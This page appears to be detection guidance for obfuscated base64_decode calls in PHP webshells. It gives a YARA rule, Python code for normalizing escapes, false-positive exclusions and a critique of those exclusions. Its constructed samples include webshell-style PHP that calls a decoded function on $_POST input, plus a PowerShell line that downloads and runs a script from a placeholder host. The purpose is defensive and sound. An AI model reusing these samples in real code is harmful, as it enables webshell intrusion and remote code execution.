Adversaries obfuscate calls to base64 decoding routines so that the function name never appears in clear text, defeating simple string-based detection. The rule below looks for the PHP function name base64_decode written as a mix of hexadecimal and octal escape sequences (the string \x62\x61\x73\145\x36\x34\x5f\x64\x65\143\x6f\144\145 decodes to base64_decode), a pattern typical of obfuscated PHP webshells and loaders. SOC teams should proactively hunt for this in Azure Sentinel (now Microsoft Sentinel) to identify potential command and control communications or payload delivery attempts that bypass basic detection rules.
YARA Rule
rule obf_base64_decode {
    strings:
        // Matches the escaped text \x62\x61\x73\145\x36\x34\x5f\x64\x65\143\x6f\144\145
        // exactly as it appears in an obfuscated source file; it decodes to "base64_decode".
        // Each backslash is doubled here because YARA strings use backslash escapes themselves.
        $ = "\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145"
    condition:
        any of them and filesize < 500KB
}
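As an added illustration (not part of the original rule or page), the Python below shows what the rule's string actually matches and why it is brittle: the YARA literal only hits one particular mix of hex and octal escapes, while a detector that first normalizes PHP \xHH and \OOO escapes catches any mix of the same name. The three PHP snippets are constructed samples, not real webshells.

```python
import re

# The text the page's YARA rule matches, exactly as it appears in a scanned file.
# The rule writes each backslash as "\\" because YARA itself uses backslash
# escapes; the bytes on disk are the 13 escape sequences below.
YARA_LITERAL = r"\x62\x61\x73\145\x36\x34\x5f\x64\x65\143\x6f\144\145"

# PHP double-quoted string escapes: \xHH (one or two hex digits) and \OOO
# (one to three octal digits). Other escapes (\n, \t, ...) are left alone.
_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")

# A run of identifier characters and/or escape sequences: one candidate
# (possibly partially obfuscated) identifier inside a string literal.
_TOKEN_RE = re.compile(r"(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{1,3}|[A-Za-z0-9_])+")


def unescape_php(s: str) -> str:
    """Resolve \\xHH and \\OOO escapes to the characters they encode."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return _ESCAPE_RE.sub(repl, s)


def yara_literal_matches(content: str) -> bool:
    """Emulate the page's rule: a substring match on one fixed hex/octal mix."""
    return YARA_LITERAL in content


def find_obfuscated_calls(content: str, needle: str = "base64_decode") -> list:
    """Return every escape-obfuscated token that decodes to something containing
    `needle`, whatever mix of \\xHH and \\OOO the author chose. Tokens without
    any escape are skipped, so a plain base64_decode() call is not reported."""
    hits = []
    for m in _TOKEN_RE.finditer(content):
        token = m.group(0)
        if "\\" not in token:
            continue  # not obfuscated: leave it to ordinary string rules
        if needle in unescape_php(token):
            hits.append(token)
    return hits


# Constructed samples (not real malware): the exact mix from the rule, an
# all-hex variant of the same name, and a benign file with an unrelated escape.
SAMPLE_EXACT = r'<?php $f = "\x62\x61\x73\145\x36\x34\x5f\x64\x65\143\x6f\144\145"; echo $f($_POST["c"]); ?>'
SAMPLE_VARIANT = r'<?php $f = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65"; echo $f($_POST["c"]); ?>'
SAMPLE_BENIGN = r'<?php $banner = "\x41\x42"; echo base64_decode($config["blob"]); ?>'

if __name__ == "__main__":
    for name, sample in [("exact", SAMPLE_EXACT), ("variant", SAMPLE_VARIANT), ("benign", SAMPLE_BENIGN)]:
        print(f"{name:8} yara_literal={yara_literal_matches(sample)!s:5} "
              f"normalized={find_obfuscated_calls(sample)}")
```

The same normalization can be expressed in YARA with a regular expression that allows either escape form for every character of base64_decode; the Python version is shown because it makes the decoding step visible and is easy to run over a corpus of known-good files before any exclusions are written.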
The rule matches file content, so its hits are triaged alongside the process that wrote or executed the file. The following benign scenarios are common sources of false positives; the filter next to each is a starting point for an exclusion on that process telemetry, to be narrowed to your environment:
Scenario: Base64 decoding of a legitimate configuration file during a scheduled backup job
Filter/Exclusion: process.parent_process_name == "backup_service.exe" or process.command_line contains "backup"
Scenario: Base64 decoding of a script used by a system management tool like Ansible or Puppet
Filter/Exclusion: process.name contains "ansible" or process.name contains "puppet" or process.command_line contains "playbook"
Scenario: Base64 decoding of a payload during a legitimate software update process (e.g., using Chocolatey or Scoop)
Filter/Exclusion: process.name contains "choco" or process.name contains "scoop" or process.command_line contains "install"
Scenario: Base64 decoding of a file during a legitimate log parsing task using the ELK Stack or Splunk
Filter/Exclusion: process.name contains "logstash" or process.name contains "splunkd" or process.command_line contains "parse"
Scenario: Base64 decoding of a certificate or key file during a certificate management task using CertMgr or OpenSSL
Filter/Exclusion: process.name contains "certmgr" or process.name contains "openssl" or process.command_line contains "cert" or process.command_line contains "key"
Every filter above keys on a process name or a command-line substring, both of which are under the attacker's control: a payload copied to choco.exe, or a command line that merely contains "install", "cert" or "key", is excluded together with the legitimate activity. Before deploying any of them, scope the exclusion to the full image path of the tool (and its signer, where the telemetry records one), its expected parent process, and the hosts where it is actually installed; the single-word substring filters on "install", "parse", "cert" and "key" are too broad to run as written.
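To make the risk in these substring exclusions concrete, here is an added Python example (not from the original page) that applies the Chocolatey filter as written, and a narrower version keyed on image path and parent process, to three constructed process events. Field names follow the page's filters; the Chocolatey install directory is its documented default, and the parent-process allow-list is an assumption about the environment being tuned.

```python
# Constructed process events (not real telemetry). Field names follow the
# page's filters; paths and parents are hypothetical.
EVENTS = [
    {   # genuine Chocolatey run from an interactive shell
        "id": 1, "name": "choco.exe",
        "image_path": r"C:\ProgramData\chocolatey\choco.exe",
        "parent_process_name": "cmd.exe",
        "command_line": "choco install git -y",
    },
    {   # loader spawned by a web server; its command line happens to say "install"
        "id": 2, "name": "powershell.exe",
        "image_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_process_name": "w3wp.exe",
        "command_line": 'powershell -c "iwr http://example.invalid/install.txt | iex"',
    },
    {   # an unrelated binary renamed to choco.exe and run from a user-writable path
        "id": 3, "name": "choco.exe",
        "image_path": r"C:\Users\Public\choco.exe",
        "parent_process_name": "w3wp.exe",
        "command_line": "choco.exe -q",
    },
]

# Default Chocolatey install directory (assumption about the tuned environment).
CHOCO_DIR = "c:\\programdata\\chocolatey\\"


def page_exclusion(ev: dict) -> bool:
    """The page's Chocolatey/Scoop filter as written: substring checks only."""
    name, cmd = ev["name"].lower(), ev["command_line"].lower()
    return "choco" in name or "scoop" in name or "install" in cmd


def scoped_exclusion(ev: dict, trusted_parents=("cmd.exe", "powershell.exe", "explorer.exe")) -> bool:
    """Exclude only the package manager's own binary, from its install
    directory, launched by a parent consistent with an interactive install."""
    return (ev["name"].lower() == "choco.exe"
            and ev["image_path"].lower().startswith(CHOCO_DIR)
            and ev["parent_process_name"].lower() in trusted_parents)


def surviving_alerts(events: list, exclusion) -> list:
    """IDs of events that still reach an analyst after applying `exclusion`."""
    return [ev["id"] for ev in events if not exclusion(ev)]


if __name__ == "__main__":
    print("page filter keeps:  ", surviving_alerts(EVENTS, page_exclusion))
    print("scoped filter keeps:", surviving_alerts(EVENTS, scoped_exclusion))
```

The page's filter suppresses all three events, including the two spawned by the web server; the scoped version suppresses only the genuine install, because neither the renamed binary nor the PowerShell loader runs from the Chocolatey directory under an interactive parent.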